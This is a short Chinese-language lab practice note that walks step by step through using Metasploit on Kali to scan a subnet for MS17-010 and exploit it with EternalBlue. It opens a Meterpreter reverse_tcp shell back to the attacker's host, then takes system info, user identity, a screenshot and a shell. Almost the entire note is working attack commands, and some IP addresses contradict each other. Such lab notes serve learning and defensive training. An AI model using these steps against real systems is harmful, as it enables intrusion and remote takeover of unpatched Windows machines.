查看kali的IP地址:ifconfig
查看靶机IP地址
测试两台主机的连通性:ping ip
查看kali数据库是否开启:service postgresql status
Active:inactive(dead)表示数据库是关闭的
打开kali数据库:service postgresql start
Active:active(exited)表示数据库是开启的
进行msfdb数据库初始化:msfdb init
启动msf:msfconsole
查看数据库连接情况:在msf命令提示符下:db_status
postgresql connected to msf 说明已经成功连接到了msf
搜索ms17_010:search ms17_010
扫描命令:use auxiliary/scanner/smb/smb_ms17_010
攻击命令(后面使用):use exploit/windows/smb/ms17_010_eternalblue
此时如果不知道应该使用什么命令可以输入options获得帮助,其中关注两个命令:RHOSTS和THREADS
RHOSTS是要扫描的主机(主机段),THREADS是线段,默认是1,开始使用线程加快扫描
设置扫描的主机或主机端(由于靶机IP地址是192.168.0.0,因此设置扫描主机段位192.168.0.0/24)
set rhosts 192.168.0.0/24,然后设置扫描线程为20;最后输入run执行扫描。同时可以打开wireshark进行抓包,监听eth0。扫描出来存在ms17_010漏洞的主机,也恰好是靶机。通过跟踪TCP流,得到了靶机的基本信息:操作系统、IP地址、协议。
进行攻击:use exploit/windows/smb/ms17_010_eternalblue
设置攻击目标(靶机):set rhost 192.168.0.0
设置攻击载荷:set payload windows/x64/meterpreter/reverse_tcp
设置监听主机(kali):set lhost 192.168.0.1
利用exploit进行攻击:exploit
可以看到监听(kali)IP(192.168.148.137)及端口(4444),被攻击主机(192.168.148.113)及端口(49159)之间建立了连接
显示远程主机系统信息:sysinfo
查看用户身份:getuid
对当前远程主机屏幕进行截图:screenshot
获得shell控制台:shell
个人的练习笔记-小菜不足的地方望指导